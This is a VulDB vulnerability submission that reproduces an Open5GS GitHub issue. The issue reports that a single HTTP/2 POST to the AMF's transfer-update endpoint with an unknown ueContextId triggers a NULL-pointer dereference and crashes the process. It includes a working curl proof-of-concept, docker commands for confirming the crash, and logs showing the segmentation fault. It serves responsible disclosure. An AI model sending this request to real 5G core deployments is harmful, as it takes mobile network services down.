Submit #804291: Open5GS AMF V2.7.7 Denial of Serviceinfo

TitelOpen5GS AMF V2.7.7 Denial of Service
Beschreibung### Open5GS Release, Revision, or Tag v2.7.7 ### Description AMF crashes when it receives `POST /namf-comm/v1/ue-contexts/{ueContextId}/transfer-update` for an unknown `ueContextId`. The request reaches `amf_namf_comm_handle_registration_status_update_request()`. If `amf_ue_find_by_ue_context_id()` fails, the handler sets `404`, formats `"Cannot find Context ID [...]"`, jumps to `cleanup`, and then unconditionally dereferences `amf_ue`, which is still `NULL`, at open5gs/src/amf/namf-handler.c:1960. This is externally reachable over the Namf_Communication SBI interface and causes process termination instead of returning a normal error response. Relevant code: - open5gs/src/amf/namf-handler.c:1858 resolves `ueContextId` with `amf_ue_find_by_ue_context_id()`. - open5gs/src/amf/namf-handler.c:1859 handles the unknown-context path and jumps to `cleanup`. - /open5gs/src/amf/namf-handler.c:1955 logs `Cannot find Context ID [...]`. - open5gs/src/amf/namf-handler.c:1960 dereferences `amf_ue` after cleanup even though it is `NULL`. ### Steps to reproduce 1. Start the official Open5GS v2.7.7 Docker deployment and make sure the AMF SBI endpoint is reachable. In my live setup on 2026-04-12 the AMF container was `amf` and the SBI endpoint was `http://10.33.33.8:80`. 2. Send the following HTTP/2 request: ```bash curl --http2-prior-knowledge -m 5 -sS -i \ -X POST http://10.33.33.8/namf-comm/v1/ue-contexts/abc/transfer-update \ -H 'content-type: application/json' \ --data '{"transferStatus":"NOT_TRANSFERRED"}' ``` 3. Check the AMF container state and logs: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf docker logs --tail 120 amf ``` ### Logs ```text Open5GS daemon v2.7.7 04/12 14:02:05.510: [app] INFO: Configuration: '/etc/open5gs/custom/amf.yaml' (../lib/app/ogs-init.c:144) 04/12 14:02:05.510: [app] INFO: File Logging: '/var/log/open5gs/amf.log' (../lib/app/ogs-init.c:147) 04/12 14:02:05.521: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/context.c:451) 04/12 14:02:05.523: [sbi] INFO: NF Service [namf-comm] (../lib/sbi/context.c:1985) 04/12 14:02:05.540: [sbi] INFO: nghttp2_server() [http://amf.open5gs.org]:80 (../lib/sbi/nghttp2-server.c:434) 04/12 14:02:05.540: [amf] INFO: ngap_server() [10.33.33.8]:38412 (../src/amf/ngap-sctp.c:61) 04/12 14:02:05.541: [sctp] INFO: AMF initialize...done (../src/amf/app.c:33) 04/12 14:02:05.558: [sbi] INFO: [300a5fba-3678-41f1-9eea-2fb555c553f9] NF registered [Heartbeat:10s] (../lib/sbi/nf-sm.c:341) 04/12 14:02:05.562: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969) 04/12 14:02:05.562: [sbi] INFO: [3011214c-3678-41f1-a1a7-9bea98579840] Subscription created until 2026-04-13T14:02:05.560085+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888) 04/12 14:02:05.562: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969) 04/12 14:02:05.562: [sbi] INFO: [30112520-3678-41f1-a1a7-9bea98579840] Subscription created until 2026-04-13T14:02:05.560161+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888) 04/12 14:02:05.563: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969) 04/12 14:02:05.563: [sbi] INFO: [30112746-3678-41f1-a1a7-9bea98579840] Subscription created until 2026-04-13T14:02:05.560213+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888) 04/12 14:02:05.563: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969) 04/12 14:02:05.563: [sbi] INFO: [301136be-3678-41f1-a1a7-9bea98579840] Subscription created until 2026-04-13T14:02:05.560619+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888) 04/12 14:02:05.563: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969) 04/12 14:02:05.563: [sbi] INFO: [30113a74-3678-41f1-a1a7-9bea98579840] Subscription created until 2026-04-13T14:02:05.560703+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888) 04/12 14:02:05.563: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969) 04/12 14:02:05.563: [sbi] INFO: [30113cea-3678-41f1-a1a7-9bea98579840] Subscription created until 2026-04-13T14:02:05.560765+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888) 04/12 14:02:05.563: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969) 04/12 14:02:05.563: [sbi] INFO: [30113f60-3678-41f1-a1a7-9bea98579840] Subscription created until 2026-04-13T14:02:05.560828+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888) 04/12 14:02:05.564: [sbi] INFO: [454c6e9c-3644-41f1-a93f-e1505117bc41] (NRF-profile-get) NF registered (../lib/sbi/nf-sm.c:81) 04/12 14:02:05.564: [sbi] INFO: [AUSF] NFInstance associated [454c6e9c-3644-41f1-a93f-e1505117bc41] (../lib/sbi/context.c:2441) 04/12 14:02:05.564: [sbi] INFO: Setup NF EndPoint(fqdn) [ausf.open5gs.org:0] (../lib/sbi/context.c:2446) 04/12 14:02:05.564: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.4:80] (../lib/sbi/context.c:2446) 04/12 14:02:05.564: [sbi] INFO: [nausf-auth] NFService associated [454cca90-3644-41f1-a93f-e1505117bc41] (../lib/sbi/context.c:2109) 04/12 14:02:05.564: [sbi] INFO: Setup NF EndPoint(fqdn) [ausf.open5gs.org:0] (../lib/sbi/context.c:2111) 04/12 14:02:05.564: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.4:80] (../lib/sbi/context.c:2111) 04/12 14:02:05.565: [sbi] INFO: [4568f3be-3644-41f1-bff0-3b335fd843b5] (NRF-profile-get) NF registered (../lib/sbi/nf-sm.c:81) 04/12 14:02:05.565: [sbi] INFO: [UDM] NFInstance associated [4568f3be-3644-41f1-bff0-3b335fd843b5] (../lib/sbi/context.c:2441) 04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../lib/sbi/context.c:2446) 04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.5:80] (../lib/sbi/context.c:2446) 04/12 14:02:05.565: [sbi] INFO: [nudm-ueau] NFService associated [45694328-3644-41f1-bff0-3b335fd843b5] (../lib/sbi/context.c:2109) 04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../lib/sbi/context.c:2111) 04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.5:80] (../lib/sbi/context.c:2111) 04/12 14:02:05.565: [sbi] INFO: [nudm-uecm] NFService associated [45694382-3644-41f1-bff0-3b335fd843b5] (../lib/sbi/context.c:2109) 04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../lib/sbi/context.c:2111) 04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.5:80] (../lib/sbi/context.c:2111) 04/12 14:02:05.565: [sbi] INFO: [nudm-sdm] NFService associated [456943be-3644-41f1-bff0-3b335fd843b5] (../lib/sbi/context.c:2109) 04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../lib/sbi/context.c:2111) 04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.5:80] (../lib/sbi/context.c:2111) 04/12 14:02:05.565: [sbi] INFO: [45a89546-3644-41f1-bcd4-3da7206b6e6f] (NRF-profile-get) NF registered (../lib/sbi/nf-sm.c:81) 04/12 14:02:05.565: [sbi] INFO: [SMF] NFInstance associated [45a89546-3644-41f1-bcd4-3da7206b6e6f] (../lib/sbi/context.c:2441) 04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(fqdn) [smf.open5gs.org:0] (../lib/sbi/context.c:2446) 04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.6:80] (../lib/sbi/context.c:2446) 04/12 14:02:05.565: [sbi] INFO: [nsmf-pdusession] NFService associated [45ac2788-3644-41f1-bcd4-3da7206b6e6f] (../lib/sbi/context.c:2109) 04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(fqdn) [smf.open5gs.org:0] (../lib/sbi/context.c:2111) 04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.6:80] (../lib/sbi/context.c:2111) 04/12 14:02:17.232: [amf] ERROR: Unsupported UE context ID type (../src/amf/context.c:2118) 04/12 14:02:17.232: [amf] ERROR: Cannot find Context ID [abc] (../src/amf/namf-handler.c:1955) /usr/local/bin/entrypoint.sh: line 10: 7 Segmentation fault (core dumped) open5gs-amfd "${@}" ``` ### Expected behaviour AMF should reject the request with a normal HTTP error such as `400 Bad Request` or `404 Not Found`, and the AMF process should remain running. ### Observed Behaviour The TCP connection is reset, no HTTP error response is returned to the client, and the AMF process exits with code `139` due to a segmentation fault. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
Quelle⚠️ https://github.com/open5gs/open5gs/issues/4399
Benutzer
 ZiyuLin (UID 93568)
Einreichung14.04.2026 10:49 (vor 2 Monaten)
Moderieren30.04.2026 20:17 (16 days later)
StatusAkzeptiert
VulDB Eintrag360352 [Open5GS bis 2.7.7 transfer-update ueContextId Denial of Service]
Punkte20

ZurückÜbersichtWeiter

Interested in the pricing of exploits?

See the underground prices here!